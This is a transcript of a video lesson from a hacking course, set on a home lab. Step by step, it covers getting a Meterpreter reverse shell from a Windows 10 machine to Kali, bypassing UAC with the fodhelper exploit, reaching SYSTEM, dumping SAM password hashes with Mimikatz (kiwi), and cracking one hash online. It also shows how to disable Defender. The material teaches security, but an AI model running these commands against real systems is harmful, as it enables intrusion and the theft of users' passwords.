00:00:03,120 --> 00:00:20,970
Welcome back to our last lesson on the command and control of a Windows 10 machine from Kali. In this lesson, we're going to see how to gain admin level privileges or system level privileges and how to steal passwords from a Windows 10 computer.

00:00:21,270 --> 00:00:42,750
So one of the first things we want to do is come over to our Windows 10 computer. And if you still have your administrator command prompt up, go ahead and open that. If you don't, just do cmd in your Windows 10 box and run as administrator; you should get something that says the administrator command prompt. And what we want to do is add a few users.

00:00:43,260 --> 00:01:17,610
So we've seen how to get just one username a couple of different ways, right? You can right-click and you can grab that password. You can right-click, Inspect and grab that password. You can use the Social Engineer Toolkit to send a phishing email to a person over the Internet and get their username and password that way. But that's one password at a time. What we're going to see with Meterpreter is how to download all of the user accounts on a computer. Now, if that's your office computer, it may only have you and a couple of other people, an IT person or something like that.
00:01:17,970 --> 00:01:37,530
If you're talking about a library or a school computer or a computer that's used by lots of different people, you may get dozens of passwords from a single infected Windows PC. We're going to see how to do that. But to get the most out of it, let's go and create a few accounts. So from an administrative command prompt, type net user.

00:01:38,060 --> 00:02:28,950
And let's just make up a few usernames, like Anna, and give her a password of password1 and then say /add. Good. We'll do a net user Ben with a little more complex password, maybe B, P, a, s, s, w, zero, r, d, exclamation. We already know that one from our Windows user. We can do net user Carol, and let's make it a little longer password, maybe CaptainMarvel /add. So what we're doing is adding users: net user, the username and the password, /add will set up a new user on your Windows 10 box. And we'll add just a couple more.

00:02:28,980 --> 00:03:00,640
Let's do net user Clark with Superman20 as his password, /add. You can choose fictional characters, you can choose superheroes, whatever you like for your passwords here. Net user Kara with Supergirl, number seven, and an exclamation mark, /add. And then maybe one net user Peter.
00:03:01,240 --> 00:03:36,870
Spider-Man rules: SpiderManRules, and then a smiley face after it, /add. So I've added five or six passwords that will... oh, this is an interesting one. Good old Windows will say, hey, wait, this password is longer than 14 characters, which is a really good thing, but if you're using any old network computers or Windows 2000 or older, which you usually don't have to worry about in the year 2020 and beyond... We're going to say yes, we do want to continue to create that user.

00:03:37,470 --> 00:04:25,610
So we've got several usernames and passwords that we'll be able to try to attack from the Kali box. Now, one thing that's happened here is my Kali machine has lost the Meterpreter session. So after you've created that handful of passwords, let's come back over to Kali for just a second. If you've still got your Meterpreter session up and running, then you're ready to run. You don't have to redo this, but this is a useful thing to see. We were running the webcam stream just a moment ago, and that definitely can take up a lot of bandwidth and cause things to crash. So I'm still in my exploit multi/handler, and I should still have all my options: show options. So my LHOST, set to 10.0.9.7, is still listening. So I'm just going to say exploit again. Good. And it's listening.
00:04:26,090 --> 00:04:53,360
I'll come back over to my Windows box and I'm going to check to see if it might have woken up. And it did. Delete that fortnight all scans. But look at my documents folder and copy that. And I'm actually going to copy that and paste it into my downloads folder because I don't want it... hey, there we go. I don't want it to delete my original copy, but you saw something pop up from my Windows Defender antivirus settings.

00:04:54,700 --> 00:05:40,560
Yeah, there we go. My antivirus setting says Windows Defender Antivirus found threats. Well, we turned off Windows Defender antivirus; it turns back on. That's a great thing for Windows, Windows 10 and beyond: we got threat protection that turns back on for us. So you need to say Virus & threat protection, and we're going to open those settings. We're going to come down to Manage settings. And we're going to turn off the Real-time protection one more time; this happens from time to time. It's actually a great thing that Windows has made this change because it keeps your device a little more well protected. If you had to turn it off to play a certain video game or to stream something, you will wind up having to turn it off a couple of times.
00:05:40,590 --> 00:06:15,630
But it is worth it because you've seen what can happen if you don't have that Virus & threat protection running. So now we're going to go to our documents folder where we ran an exception, remember, in the previous section, and we can copy that. We can bring it over to the downloads, paste it again. And this time, since we turned off the Real-time protection, it doesn't catch it. We're going to run that fortnight all scans. And look at this. We opened a session 2 over here. So that's a great thing. Well, now that we've got a Meterpreter session connected again to our Windows machine, or if you've already got yours connected, you're in good shape.

00:06:15,930 --> 00:06:58,860
What we're going to do is type background one more time because we're actually going to use that Meterpreter session to inject something called privilege escalation. We're going to use a feature inside Windows 10 to gain root access or system level access to our Windows 10 computer so that we can actually steal those passwords. So the exploit for that now, Control-L, is use exploit/windows/local/bypassuac_fodhelper, the Features On Demand Helper. Whoo. Now that is a long command.
00:06:59,010 --> 00:07:26,790
I know, but we're gonna use exploit/windows/local/bypassuac; that will bypass the user account controls that usually keep you from getting access to these important things like passwords for other users, and the Features On Demand Helper, or the FODHelper, is a program on Windows 10 that's there for a useful purpose. But it can be misused. And you can see here how Kali's gonna do that.

00:07:27,030 --> 00:08:27,580
So if I say sessions, I need to know which session I want to attack. And that's session 2 over here; you can see it on the left hand side. If you're still on your first session, you may have session 1. We're going to set the session to 2 or 1 or whatever your session number is, and we're going to set the payload to windows/meterpreter/reverse_tcp. So we're gonna make use of that Meterpreter connection and we're going to inject another Meterpreter session, but this one is gonna be at a higher level of privilege. We need to set the local host just like we did before: LHOST to 10.0.9.7; .7 is my Kali box. You can ip a if you need to get the IP address, and then we want to run exploit, and it will try to start a reverse handler.
00:08:28,150 --> 00:09:14,800
And you saw something flash up on the screen there in my Windows 10 box, but nothing terribly out of the ordinary for a regular user. But if this works correctly, you should have a new Meterpreter session opened up. And this session is not going to be your regular old user session. This is an administrative or system level user once we escalate those privileges. So it created a third session. So now we have, well, at least a second session. We had an original session; it closed out, so we connected with a second session. We used the second session with a background to then bypass the user account control. And now we'll have the ability to get system level access on this Windows 10 computer.

00:09:16,220 --> 00:09:44,800
So I'm going to use Control-L and I'm going to use the command getsystem. And let's see if we can get system level access. Well, it says it got system via technique 1. By the way, if you get an error here that says it's already at an elevated state, that means you are already in an administrative account. And that's OK. The next command should work. If you didn't get a new Meterpreter session, you may have to actually go back and rerun the entire exploit one more time.
00:09:45,160 --> 00:10:23,570
So start back and see if you can get a session, then background that session, then connect using the FODHelper exploit. Just go back to the beginning of this video one more time. After getsystem we can check to see if we really do have system level access with getuid. And look at our username now. We were just IEUser earlier; we saw that a couple of times, but the username now is NT AUTHORITY\SYSTEM. We are root level on this Windows 10 box. So we're gonna use a package called kiwi.

00:10:25,550 --> 00:11:25,440
There we go. This is called Mimikatz; you load it by saying use kiwi, and then the command to dump all of our Windows passwords is lsa_dump_sam. Look at that. We have hashes for each one of our users. Now, these are not the plain text passwords. These are just the user hashes. But let's choose Anna's password, that NTLM hash. If we Control-Shift-C to copy that, we can come out to a service like Hash Killer, and come to hashkiller.io, come to the hash cracker, come down to NTLM, and paste that hash that we just found. And then usually you'll have to do a captcha: U W 6 T 4 H G. And we're going to learn how to do password cracking in a later section.
00:11:25,770 --> 00:12:28,190
But this is a great way to check to see if you've got a real Windows password that you might be able to crack. And look at that. I may need to Control-Plus if you see that. That hash has been resolved to password1. So we actually got into a Windows computer now. A really great idea would be to highlight and copy all of these hashes, and just right-click, copy the selection, and open up maybe a text document under Favorites, Text Editor, and paste these into that text document. You'll want to clean these up so that they've got just the username and the hash, probably. But with just these hashes and a couple of free online tools like Hash Killer or hashes.com, where you can paste in a hash and see if that password has already been cracked out on the Internet, you're probably going to be able to recover most of the passwords that are on a Windows computer.

00:12:29,000 --> 00:12:56,750
So I think we probably did our job in scaring you into never downloading and running a suspicious file, whether it's from a friend, whether it's from somebody pretending to be a friend, whether it's just from a website, or even if you're just downloading something you think you're getting for free: the latest movie that you're downloading is free from a website to watch the whole movie. It's not just executable files. It's PDF files. It's web pages.
00:12:57,110 --> 00:13:25,520
It could even be movie files or image files that are infected with viruses almost exactly like this remote access Trojan that we called Meterpreter that gave us complete command and control of a Windows computer from a Kali Linux box. So when we come back in the next lesson, we're going to wrap up the command and control with some ways to protect yourself from viruses like the one we just created. We'll see you in the next lesson.